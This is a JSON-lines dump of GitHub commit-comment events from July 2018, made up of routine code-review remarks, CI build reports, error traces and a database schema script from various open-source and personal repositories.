{"id":"8002582309","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29797473,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-23T08:59:45Z","updated_at":"2018-07-23T08:59:45Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T08:59:45Z"}
{"id":"8002583250","type":"CommitCommentEvent","actor":{"login":"jeroenroosen"},"repo":{"name":"robotframework/robotframework"},"payload":{"comment":{"id":29797475,"position":10,"line":46,"path":"src/robot/running/arguments/argumentparser.py","commit_id":"34f4a2d424b7df596b223944d037bdcf6771d660","created_at":"2018-07-23T08:59:56Z","updated_at":"2018-07-23T08:59:56Z","author_association":"NONE","body":"I think this should be `annotations = inspect.getfullargspec(handler).annotations` otherwise you wouldn't have the typing information you're looking for."}},"created_at":"2018-07-23T08:59:56Z"}
{"id":"8002592742","type":"CommitCommentEvent","actor":{"login":"alaac4q"},"repo":{"name":"alaac4q/Developers-Social-Network-App"},"payload":{"comment":{"id":29797501,"position":3,"line":3,"path":"README.md","commit_id":"a24dee2d51f14ac2072f0f178de2d22bed7d3b23","created_at":"2018-07-23T09:01:45Z","updated_at":"2018-07-23T09:01:45Z","author_association":"OWNER","body":"<img width=\"1431\" alt=\"screen shot 2018-07-23 at 3 42 14 am\" src=\"https://user-images.githubusercontent.com/32101657/43067293-f1931bd0-8e34-11e8-98d7-6c0f6b9fc87a.png\">"}},"created_at":"2018-07-23T09:01:45Z"}
{"id":"8002593369","type":"CommitCommentEvent","actor":{"login":"libliang17"},"repo":{"name":"zhejiangxiaomai/mariadb-connector-j"},"payload":{"comment":{"id":29797502,"position":86,"line":499,"path":"src/main/java/org/mariadb/jdbc/internal/protocol/AbstractConnectProtocol.java","commit_id":"4b7045a22883178648e93f28c54af2901aec9202","created_at":"2018-07-23T09:01:52Z","updated_at":"2018-07-23T09:01:52Z","author_association":"NONE","body":"in succeeded case, need to update the hostPortToConnection, so the following connection can use the redirected info immediately"}},"created_at":"2018-07-23T09:01:52Z"}
{"id":"8002598304","type":"CommitCommentEvent","actor":{"login":"Jekaa"},"repo":{"name":"official-stockfish/Stockfish"},"payload":{"comment":{"id":29797508,"position":null,"line":null,"path":null,"commit_id":"50287a55d3b07623120d938a4159d051e32d852d","created_at":"2018-07-23T09:02:50Z","updated_at":"2018-07-23T09:02:50Z","author_association":"NONE","body":"\"Tweak reductions formula: 0.88 * depth + 0.36\" in header"}},"created_at":"2018-07-23T09:02:50Z"}
{"id":"8002607545","type":"CommitCommentEvent","actor":{"login":"turtle321"},"repo":{"name":"puntonim/py-service-orcid"},"payload":{"comment":{"id":29797529,"position":1,"line":1,"path":"inspirehep/__init__.py","commit_id":"98d9784b9e2660173ed6f420ef0157a1ba9f0bf3","created_at":"2018-07-23T09:04:37Z","updated_at":"2018-07-23T09:04:37Z","author_association":"NONE","body":"To set the namespace: `inspirehep.services.orcid`"}},"created_at":"2018-07-23T09:04:37Z"}
{"id":"8002610196","type":"CommitCommentEvent","actor":{"login":"bearded"},"repo":{"name":"nateware/redis-objects"},"payload":{"comment":{"id":29797534,"position":4,"line":3,"path":"lib/redis/objects/version.rb","commit_id":"e502ccbd59eaebcf876ce7d3ac204decb4c9003e","created_at":"2018-07-23T09:05:09Z","updated_at":"2018-07-23T09:05:09Z","author_association":"NONE","body":"```\r\n$ gem search redis-objects \r\n\r\n*** REMOTE GEMS ***\r\n\r\nredis-objects (1.4.0)\r\n```"}},"created_at":"2018-07-23T09:05:09Z"}
{"id":"8002610776","type":"CommitCommentEvent","actor":{"login":"smac89"},"repo":{"name":"smac89/rtl8821au"},"payload":{"comment":{"id":29797535,"position":null,"line":null,"path":null,"commit_id":"0c8d37c234971ba4a9715642bfe03f4c07533c6a","created_at":"2018-07-23T09:05:15Z","updated_at":"2018-07-23T09:05:15Z","author_association":"OWNER","body":"fixes #2 "}},"created_at":"2018-07-23T09:05:15Z"}
{"id":"8002615533","type":"CommitCommentEvent","actor":{"login":"sunnylqm"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29797542,"position":null,"line":null,"path":null,"commit_id":"1c90a2b47b420a4b6aa16a55a344cc08f0eacbe3","created_at":"2018-07-23T09:06:12Z","updated_at":"2018-07-23T09:06:12Z","author_association":"CONTRIBUTOR","body":"@yungsters This should be updated on doc https://facebook.github.io/react-native/docs/native-components-android#5-implement-the-javascript-module"}},"created_at":"2018-07-23T09:06:12Z"}
{"id":"8002616826","type":"CommitCommentEvent","actor":{"login":"MikeUnwalla"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29797548,"position":null,"line":null,"path":null,"commit_id":"27fa0ac209e3dda6be48169694e2e9c3cad9fa78","created_at":"2018-07-23T09:06:28Z","updated_at":"2018-07-23T09:06:28Z","author_association":"CONTRIBUTOR","body":"@FredKruse, thank you."}},"created_at":"2018-07-23T09:06:28Z"}
{"id":"8002617651","type":"CommitCommentEvent","actor":{"login":"sunnylqm"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29797551,"position":null,"line":null,"path":null,"commit_id":"b549e364e0025e0e1b4005f04a9de2d767006da1","created_at":"2018-07-23T09:06:36Z","updated_at":"2018-07-23T09:06:36Z","author_association":"CONTRIBUTOR","body":"@yungsters This should be updated on doc https://facebook.github.io/react-native/docs/native-components-android#5-implement-the-javascript-module"}},"created_at":"2018-07-23T09:06:36Z"}
{"id":"8002619173","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29797552,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-23T09:06:55Z","updated_at":"2018-07-23T09:06:55Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T09:06:55Z"}
{"id":"8002620612","type":"CommitCommentEvent","actor":{"login":"hassano16007"},"repo":{"name":"hassano16007/my_testgithub"},"payload":{"comment":{"id":29797554,"position":null,"line":null,"path":null,"commit_id":"58947266006688a16f754f3be6d080c5f11a4820","created_at":"2018-07-23T09:07:12Z","updated_at":"2018-07-23T09:07:12Z","author_association":"OWNER","body":"Re66"}},"created_at":"2018-07-23T09:07:12Z"}
{"id":"8002621958","type":"CommitCommentEvent","actor":{"login":"paperchukz"},"repo":{"name":"paperchukz/myprojectx"},"payload":{"comment":{"id":29797557,"position":4,"line":9,"path":"test","commit_id":"40b8c67297e3120fd4179cc5223e78e68443c997","created_at":"2018-07-23T09:07:29Z","updated_at":"2018-07-23T09:07:29Z","author_association":"OWNER","body":"wow keren\r\n"}},"created_at":"2018-07-23T09:07:29Z"}
{"id":"8002628367","type":"CommitCommentEvent","actor":{"login":"turtle321"},"repo":{"name":"puntonim/py-service-orcid"},"payload":{"comment":{"id":29797573,"position":3,"line":3,"path":"inspirehep/services/orcid/conf.py","commit_id":"98d9784b9e2660173ed6f420ef0157a1ba9f0bf3","created_at":"2018-07-23T09:08:46Z","updated_at":"2018-07-23T09:08:46Z","author_association":"NONE","body":"This is to handle configuration (settings) for the service.\r\n\r\nFrom a partition (like `inspire-next`) you could configure this service with:\r\n```\r\nimport inspirehep.services.orcid.conf\r\ninspirehep.services.orcid.conf.settings.configure(CONSUMER_KEY='key')\r\n```\r\nSee `conftest.py` for an actual use."}},"created_at":"2018-07-23T09:08:46Z"}
{"id":"8002629990","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29797575,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-23T09:09:05Z","updated_at":"2018-07-23T09:09:05Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T09:09:05Z"}
{"id":"8002630991","type":"CommitCommentEvent","actor":{"login":"calimairo"},"repo":{"name":"irungentoo/Xiaomi_Yi_4k_Camera"},"payload":{"comment":{"id":29797578,"position":null,"line":null,"path":null,"commit_id":"fb4c43f2e6d824919e56d23f1ced26e4ea03db43","created_at":"2018-07-23T09:09:17Z","updated_at":"2018-07-23T09:09:17Z","author_association":"NONE","body":"Hello, I do not know or post my problem, following a problem update my mijia 4k no longer lights, how to do?"}},"created_at":"2018-07-23T09:09:17Z"}
{"id":"8002631034","type":"CommitCommentEvent","actor":{"login":"turtle321"},"repo":{"name":"puntonim/py-service-orcid"},"payload":{"comment":{"id":29797579,"position":1,"line":1,"path":"setup.py","commit_id":"98d9784b9e2660173ed6f420ef0157a1ba9f0bf3","created_at":"2018-07-23T09:09:17Z","updated_at":"2018-07-23T09:09:17Z","author_association":"NONE","body":"This was automatically generated by: `make setup.py`"}},"created_at":"2018-07-23T09:09:17Z"}
{"id":"8002632008","type":"CommitCommentEvent","actor":{"login":"rodionos"},"repo":{"name":"axibase/atsd"},"payload":{"comment":{"id":29797582,"position":8,"line":5,"path":"installation/README.md","commit_id":"d068b986022f63de11b2f6dc658561d8beb3c85c","created_at":"2018-07-23T09:09:29Z","updated_at":"2018-07-23T09:09:29Z","author_association":"CONTRIBUTOR","body":"Can we move install page changes to a new PR, there will be more changes on this page, separate from calendards."}},"created_at":"2018-07-23T09:09:29Z"}
{"id":"8002635489","type":"CommitCommentEvent","actor":{"login":"turtle321"},"repo":{"name":"puntonim/py-service-orcid"},"payload":{"comment":{"id":29797592,"position":1,"line":1,"path":"setup_gen.py","commit_id":"98d9784b9e2660173ed6f420ef0157a1ba9f0bf3","created_at":"2018-07-23T09:10:11Z","updated_at":"2018-07-23T09:10:11Z","author_association":"NONE","body":"This is to automatically generate the `setup.py`.\r\nIt is what `make publish` uses (via `make setup.py`)."}},"created_at":"2018-07-23T09:10:11Z"}
{"id":"8002637872","type":"CommitCommentEvent","actor":{"login":"maruthi1236"},"repo":{"name":"maruthi1236/ns25RepoSSH"},"payload":{"comment":{"id":29797597,"position":null,"line":null,"path":null,"commit_id":"44215bc8edac7720821ad767a1c4fc0e325d0b13","created_at":"2018-07-23T09:10:39Z","updated_at":"2018-07-23T09:10:39Z","author_association":"OWNER","body":"gfr"}},"created_at":"2018-07-23T09:10:39Z"}
{"id":"8002638417","type":"CommitCommentEvent","actor":{"login":"redongjun"},"repo":{"name":"sdroege/gst-plugin-threadshare"},"payload":{"comment":{"id":29797599,"position":50,"line":211,"path":"src/socket.rs","commit_id":"3deb93a2a22f851d4d2f4576c87596cce6e7b936","created_at":"2018-07-23T09:10:45Z","updated_at":"2018-07-23T09:10:45Z","author_association":"NONE","body":"I agree with you.\r\n\r\nbut after the Socket structure changed the Socket<T> structure, the clone() function was returned as a reference type, so I couldn't use it. \r\n\r\n```\r\nerror[E0308]: mismatched types=======================================> ] 67/68: gst-plugin-threadshare\r\n  --> src/socket.rs:96:40\r\n   |\r\n96 |         let stream = SocketStream::<T>(self.clone(), None);\r\n   |                                        ^^^^^^^^^^^^ expected struct `socket::Socket`, found reference\r\n   |\r\n   = note: expected type `socket::Socket<T>`\r\n              found type `&socket::Socket<T>`\r\n```\r\n\r\nCould you advise me?"}},"created_at":"2018-07-23T09:10:45Z"}
{"id":"8002640377","type":"CommitCommentEvent","actor":{"login":"hassano16007"},"repo":{"name":"hassano16007/my_testgithub"},"payload":{"comment":{"id":29797603,"position":null,"line":null,"path":null,"commit_id":"58947266006688a16f754f3be6d080c5f11a4820","created_at":"2018-07-23T09:11:08Z","updated_at":"2018-07-23T09:11:08Z","author_association":"OWNER","body":"6"}},"created_at":"2018-07-23T09:11:08Z"}
{"id":"8002641428","type":"CommitCommentEvent","actor":{"login":"rodionos"},"repo":{"name":"axibase/atsd"},"payload":{"comment":{"id":29797607,"position":17,"line":28,"path":"rule-engine/holiday-calendar.md","commit_id":"d068b986022f63de11b2f6dc658561d8beb3c85c","created_at":"2018-07-23T09:11:20Z","updated_at":"2018-07-23T09:11:20Z","author_association":"CONTRIBUTOR","body":"It's one specific function that raises an error."}},"created_at":"2018-07-23T09:11:20Z"}
{"id":"8002643374","type":"CommitCommentEvent","actor":{"login":"sunnylqm"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29797613,"position":44,"line":31,"path":"Libraries/ReactNative/requireNativeComponent.js","commit_id":"8dc3ba0444c94d9bbb66295b5af885bff9b9cd34","created_at":"2018-07-23T09:11:43Z","updated_at":"2018-07-23T09:11:43Z","author_association":"CONTRIBUTOR","body":"@yungsters This should be updated on doc https://facebook.github.io/react-native/docs/native-components-android#5-implement-the-javascript-module"}},"created_at":"2018-07-23T09:11:43Z"}
{"id":"8002656970","type":"CommitCommentEvent","actor":{"login":"hun-a"},"repo":{"name":"hun-a/node-microservice"},"payload":{"comment":{"id":29797636,"position":null,"line":null,"path":null,"commit_id":"250418471dc347138b52589b3e9b6f21038cdc59","created_at":"2018-07-23T09:14:21Z","updated_at":"2018-07-23T09:14:21Z","author_association":"OWNER","body":"This important property is not written in the example of book so gateway process have been terminated by below error message.\r\n```\r\n/Users/seunghun/git/study/micro/microservice/gate.js:137\r\n  mapResponse[packet.key].writeHead(200, {\r\n                          ^\r\n\r\nTypeError: Cannot read property 'writeHead' of undefined\r\n    at tcpClient.onReadClient [as onRead] (/Users/seunghun/git/study/micro/microservice/gate.js:137:27)\r\n    at Socket.client.on.data (/Users/seunghun/git/study/micro/microservice/client.js:31:16)\r\n    at emitOne (events.js:116:13)\r\n    at Socket.emit (events.js:211:7)\r\n    at addChunk (_stream_readable.js:263:12)\r\n    at readableAddChunk (_stream_readable.js:250:11)\r\n    at Socket.Readable.push (_stream_readable.js:208:10)\r\n    at TCP.onread (net.js:607:20)\r\n```"}},"created_at":"2018-07-23T09:14:21Z"}
{"id":"8002658575","type":"CommitCommentEvent","actor":{"login":"bo-oz"},"repo":{"name":"golov/vimeo_me2"},"payload":{"comment":{"id":29797643,"position":null,"line":null,"path":null,"commit_id":"2cbdb4ba79d3da9023dee8422436bd7765ba588e","created_at":"2018-07-23T09:14:40Z","updated_at":"2018-07-23T09:14:40Z","author_association":"NONE","body":"Nice improvement. Could you create a pull request for this?"}},"created_at":"2018-07-23T09:14:40Z"}
{"id":"8002661526","type":"CommitCommentEvent","actor":{"login":"rodionos"},"repo":{"name":"axibase/atsd"},"payload":{"comment":{"id":29797650,"position":5,"line":7,"path":"rule-engine/holiday-calendar.md","commit_id":"d068b986022f63de11b2f6dc658561d8beb3c85c","created_at":"2018-07-23T09:15:14Z","updated_at":"2018-07-23T09:15:14Z","author_association":"CONTRIBUTOR","body":"The lists are not 'available' by default. Each calendar file contains a list of dates, and then I wanted to say where these calendars can be used, namely to check if the given date is a working or a non-working date in a particular country. Because ATSd supports custom calendars, such calendars can be created for a variaty of use cases (I enumerated) some, but the administrator has do to it himself. We're not making these lists available, except for a based set of country calendars containing national holidays only for CY 2018."}},"created_at":"2018-07-23T09:15:14Z"}
{"id":"8002665061","type":"CommitCommentEvent","actor":{"login":"IanSavchenko"},"repo":{"name":"tobiipro/aws-util-firecloud"},"payload":{"comment":{"id":29797659,"position":null,"line":null,"path":null,"commit_id":"2609838142d311a9640e554f56a2b5b773d60525","created_at":"2018-07-23T09:15:53Z","updated_at":"2018-07-23T09:15:53Z","author_association":"CONTRIBUTOR","body":"> meaning you don't want to add the ctx.log.info call inside ctx.trackTime ?! because that's what i'd do, but it sounds like you have other plans\r\n\r\nctx.log is not properly initialized before env ctx is fetched and merged. \r\n\r\n> removing 18 lines (one start, one end for 9 _.consoleLogTime) cannot possible be a game-changer\r\n\r\nThat's true, just telling another AWS cool-story :)\r\n\r\nI'm ok with sacrificing some time reports logs, because I haven't seen any timeout issues for lambdas recently, but saw many others. If lambda fails constantly due timeout - it has to be fixed right away. If lambda fails due to timeout sporadically - lower LOG_LEVEL to 'DEBUG' and see in time report if execution times are close to timeout. \r\n\r\nAnyway, I think that in the current state it should do the job of a better diagnostics. If it doesn't, we'll fix it. "}},"created_at":"2018-07-23T09:15:53Z"}
{"id":"8002666866","type":"CommitCommentEvent","actor":{"login":"romanz"},"repo":{"name":"romanz/electrs"},"payload":{"comment":{"id":29797662,"position":null,"line":null,"path":null,"commit_id":"2f9b529da89ddf2a379ba48149980eb89de25308","created_at":"2018-07-23T09:16:14Z","updated_at":"2018-07-23T09:16:14Z","author_association":"OWNER","body":"Fixed #40 "}},"created_at":"2018-07-23T09:16:14Z"}
{"id":"8002671141","type":"CommitCommentEvent","actor":{"login":"rodionos"},"repo":{"name":"axibase/atsd"},"payload":{"comment":{"id":29797666,"position":8,"line":9,"path":"rule-engine/holiday-calendar.md","commit_id":"d068b986022f63de11b2f6dc658561d8beb3c85c","created_at":"2018-07-23T09:17:03Z","updated_at":"2018-07-23T09:17:03Z","author_association":"CONTRIBUTOR","body":"What I'd like to say here is that calendars are uniquely identified by `key`. This calendar key has be to referenced in SQL query functions and rule engine functions. In other words, to check a day, you need to refer to particular calendar by its key within a function."}},"created_at":"2018-07-23T09:17:03Z"}
{"id":"8002673634","type":"CommitCommentEvent","actor":{"login":"tdhooper"},"repo":{"name":"KoltesDigital/shadertoy-exporter"},"payload":{"comment":{"id":29797677,"position":null,"line":null,"path":null,"commit_id":"9d802f9c3235c088d9c1a548c7932c66bda52907","created_at":"2018-07-23T09:17:33Z","updated_at":"2018-07-23T09:17:33Z","author_association":"COLLABORATOR","body":"There's also the note in the description at the top of https://github.com/KoltesDigital/shadertoy-exporter"}},"created_at":"2018-07-23T09:17:33Z"}
{"id":"8002685530","type":"CommitCommentEvent","actor":{"login":"pinkpinkpig"},"repo":{"name":"pinkpinkpig/expand-component"},"payload":{"comment":{"id":29797700,"position":2,"line":2,"path":"README.md","commit_id":"003cf871571ec4f91154fc47fe5f70fd925711b6","created_at":"2018-07-23T09:19:51Z","updated_at":"2018-07-23T09:19:51Z","author_association":"OWNER","body":"1. 该组件是一个分类列表展开组件。"}},"created_at":"2018-07-23T09:19:51Z"}
{"id":"8002686396","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29797701,"position":null,"line":null,"path":null,"commit_id":"d775cca5a9dd2cfafdc4f9e8ab1d2849eea3495e","created_at":"2018-07-23T09:20:02Z","updated_at":"2018-07-23T09:20:02Z","author_association":"OWNER","body":"@snicolet \r\nI have set prio to -1. It seems that nearly only noobpwnftw's 16 core machines are the problem (perhaps because of memory: we need 4 GB and the machines has only 4GB). But to get a clear result and ruling that out i would start another VLTC with hash=64 MB."}},"created_at":"2018-07-23T09:20:02Z"}
{"id":"8002698538","type":"CommitCommentEvent","actor":{"login":"golov"},"repo":{"name":"golov/vimeo_me2"},"payload":{"comment":{"id":29797721,"position":null,"line":null,"path":null,"commit_id":"2cbdb4ba79d3da9023dee8422436bd7765ba588e","created_at":"2018-07-23T09:22:25Z","updated_at":"2018-07-23T09:22:25Z","author_association":"OWNER","body":"@bo-oz I can do, but I haven't added tests.\r\n\r\nThe pull upload method doesn't work with vimeo 3.4, so I needed to get this in quickly for my project. "}},"created_at":"2018-07-23T09:22:25Z"}
{"id":"8002737421","type":"CommitCommentEvent","actor":{"login":"Djamo18"},"repo":{"name":"Djamo18/Hello--World"},"payload":{"comment":{"id":29797817,"position":null,"line":null,"path":null,"commit_id":"56a90837406c16096d7c0e32aa9d0171f9b733ed","created_at":"2018-07-23T09:29:47Z","updated_at":"2018-07-23T09:29:47Z","author_association":"OWNER","body":"i need help on coding "}},"created_at":"2018-07-23T09:29:47Z"}
{"id":"8002750388","type":"CommitCommentEvent","actor":{"login":"aivus"},"repo":{"name":"svintuskbd/mvc.site"},"payload":{"comment":{"id":29797834,"position":23,"line":58,"path":"application/models/ModelBlog.php","commit_id":"6482e488ce77eecc5d7586c937713bcbd871da94","created_at":"2018-07-23T09:32:07Z","updated_at":"2018-07-23T09:32:07Z","author_association":"NONE","body":"Please, use PDO. Don't compile SQL from the parts using `$_POST`.\r\nCurrent approach causes SQL Injection vulnerability\r\nSee https://habr.com/post/148151/"}},"created_at":"2018-07-23T09:32:07Z"}
{"id":"8002751144","type":"CommitCommentEvent","actor":{"login":"pinkpinkpig"},"repo":{"name":"pinkpinkpig/expand-component"},"payload":{"comment":{"id":29797836,"position":2,"line":2,"path":"README.md","commit_id":"003cf871571ec4f91154fc47fe5f70fd925711b6","created_at":"2018-07-23T09:32:15Z","updated_at":"2018-07-23T09:32:15Z","author_association":"OWNER","body":"kdnfj"}},"created_at":"2018-07-23T09:32:15Z"}
{"id":"8002754691","type":"CommitCommentEvent","actor":{"login":"pinkpinkpig"},"repo":{"name":"pinkpinkpig/expand-component"},"payload":{"comment":{"id":29797846,"position":null,"line":null,"path":null,"commit_id":"003cf871571ec4f91154fc47fe5f70fd925711b6","created_at":"2018-07-23T09:32:53Z","updated_at":"2018-07-23T09:32:53Z","author_association":"OWNER","body":"该组件是一个分类列表展开组件。<br>"}},"created_at":"2018-07-23T09:32:53Z"}
{"id":"8002765234","type":"CommitCommentEvent","actor":{"login":"hassano16007"},"repo":{"name":"hassano16007/my_testgithub"},"payload":{"comment":{"id":29797865,"position":null,"line":null,"path":null,"commit_id":"c1f159d57711ea555c3003feaed4617a396cc3e7","created_at":"2018-07-23T09:34:52Z","updated_at":"2018-07-23T09:34:52Z","author_association":"OWNER","body":"c1f159d"}},"created_at":"2018-07-23T09:34:52Z"}
{"id":"8002766497","type":"CommitCommentEvent","actor":{"login":"alexellis"},"repo":{"name":"openfaas/faas-cli"},"payload":{"comment":{"id":29797866,"position":106,"line":283,"path":"builder/build_test.go","commit_id":"3b34b08f1e14ff01bff50142f65a2b57a37a04f7","created_at":"2018-07-23T09:35:06Z","updated_at":"2018-07-23T09:35:06Z","author_association":"MEMBER","body":"@ivanayov why is this test commented out?"}},"created_at":"2018-07-23T09:35:06Z"}
{"id":"8002766608","type":"CommitCommentEvent","actor":{"login":"publishers"},"repo":{"name":"publishers/Excel-Object-Mapper"},"payload":{"comment":{"id":29797867,"position":146,"line":146,"path":"src/main/java/com/excel/mapper/ExcelObjectMapper.java","commit_id":"2ab66ed75a128da3897cbe6ffbbe761b49cfad06","created_at":"2018-07-23T09:35:08Z","updated_at":"2018-07-23T09:35:08Z","author_association":"OWNER","body":"need to refactor this"}},"created_at":"2018-07-23T09:35:08Z"}
{"id":"8002769813","type":"CommitCommentEvent","actor":{"login":"yehudacooper2"},"repo":{"name":"yehudacooper2/final-project"},"payload":{"comment":{"id":29797871,"position":null,"line":null,"path":null,"commit_id":"9c1b12e6b9b63fab408fa5b9dc19a671eac37eb6","created_at":"2018-07-23T09:35:43Z","updated_at":"2018-07-23T09:35:43Z","author_association":"OWNER","body":"db script:\r\nUSE [FileDb]\r\nGO\r\n\r\n/****** Object:  Table [dbo].[FileQuery]    Script Date: 23/07/2018 12:34:00 ******/\r\nSET ANSI_NULLS ON\r\nGO\r\n\r\nSET QUOTED_IDENTIFIER ON\r\nGO\r\n\r\nCREATE TABLE [dbo].[FileQuery](\r\n\t[SearchId] [int] IDENTITY(1,1) NOT NULL,\r\n\t[SearchQuery] [nvarchar](50) NOT NULL,\r\n CONSTRAINT [PK_FileQuery] PRIMARY KEY CLUSTERED \r\n(\r\n\t[SearchId] ASC\r\n)WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY]\r\n) ON [PRIMARY]\r\n\r\nGO\r\n\r\n\r\n\r\n\r\nUSE [FileDb]\r\nGO\r\n\r\n/****** Object:  Table [dbo].[FileRes]    Script Date: 23/07/2018 12:34:36 ******/\r\nSET ANSI_NULLS ON\r\nGO\r\n\r\nSET QUOTED_IDENTIFIER ON\r\nGO\r\n\r\nCREATE TABLE [dbo].[FileRes](\r\n\t[ResId] [int] IDENTITY(1,1) NOT NULL,\r\n\t[SearchId] [int] NOT NULL,\r\n\t[PathRes] [nvarchar](500) NULL,\r\n\t[ChoosenDirectory] [nvarchar](100) NULL,\r\n CONSTRAINT [PK_FileRes] PRIMARY KEY CLUSTERED \r\n(\r\n\t[ResId] ASC\r\n)WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY]\r\n) ON [PRIMARY]\r\n\r\nGO\r\n\r\nALTER TABLE [dbo].[FileRes]  WITH CHECK ADD  CONSTRAINT [FK_FileRes_FileQuery] FOREIGN KEY([SearchId])\r\nREFERENCES [dbo].[FileQuery] ([SearchId])\r\nGO\r\n\r\nALTER TABLE [dbo].[FileRes] CHECK CONSTRAINT [FK_FileRes_FileQuery]\r\nGO\r\n\r\n\r\n"}},"created_at":"2018-07-23T09:35:43Z"}
{"id":"8002770012","type":"CommitCommentEvent","actor":{"login":"publishers"},"repo":{"name":"publishers/Excel-Object-Mapper"},"payload":{"comment":{"id":29797873,"position":147,"line":147,"path":"src/main/java/com/excel/mapper/ExcelObjectMapper.java","commit_id":"2ab66ed75a128da3897cbe6ffbbe761b49cfad06","created_at":"2018-07-23T09:35:46Z","updated_at":"2018-07-23T09:35:46Z","author_association":"OWNER","body":"Need to refactor this"}},"created_at":"2018-07-23T09:35:46Z"}
{"id":"8002770825","type":"CommitCommentEvent","actor":{"login":"Neme12"},"repo":{"name":"jcansdale/TemporaryProjects"},"payload":{"comment":{"id":29797877,"position":6,"line":154,"path":"TemporaryProjects/StartPageExtender.cs","commit_id":"a604808f335864c9b65f91af588e6cf5d1332daa","created_at":"2018-07-23T09:35:56Z","updated_at":"2018-07-23T09:35:56Z","author_association":"CONTRIBUTOR","body":"🤔 Huh, the API says it takes 2 ref parameters but it compiles without the `ref` keyword. Not only that, but I was able to pass in a `null` literal directly. I guess I still have a lot to learn about C# (or COM?)."}},"created_at":"2018-07-23T09:35:56Z"}
{"id":"8002771439","type":"CommitCommentEvent","actor":{"login":"sraps"},"repo":{"name":"aeroo/aeroolib"},"payload":{"comment":{"id":29797881,"position":null,"line":null,"path":null,"commit_id":"45ab00c5d67b3bcd46ffbaeadb945ef63c976398","created_at":"2018-07-23T09:36:02Z","updated_at":"2018-07-23T09:36:02Z","author_association":"CONTRIBUTOR","body":"Not sure what it was, but there were some problems with earlier versions of Genshi. This is not good decision."}},"created_at":"2018-07-23T09:36:02Z"}
{"id":"8002778462","type":"CommitCommentEvent","actor":{"login":"shuiyupb"},"repo":{"name":"Y1ran/Free-VPN-for-Coursera"},"payload":{"comment":{"id":29797894,"position":null,"line":null,"path":null,"commit_id":"af0f014eca0485fbc80fcf9ec1ab2f047c69cda1","created_at":"2018-07-23T09:37:23Z","updated_at":"2018-07-23T09:37:23Z","author_association":"NONE","body":"好像今天早上又被墙了。。。。"}},"created_at":"2018-07-23T09:37:23Z"}
{"id":"8002778959","type":"CommitCommentEvent","actor":{"login":"frandoLin"},"repo":{"name":"frandoLin/advancedIP"},"payload":{"comment":{"id":29797897,"position":1,"line":1,"path":"myfile.txt","commit_id":"8c50f745fae1fac6d196f8bd45a7db221b948afd","created_at":"2018-07-23T09:37:29Z","updated_at":"2018-07-23T09:37:29Z","author_association":"OWNER","body":"hi"}},"created_at":"2018-07-23T09:37:29Z"}
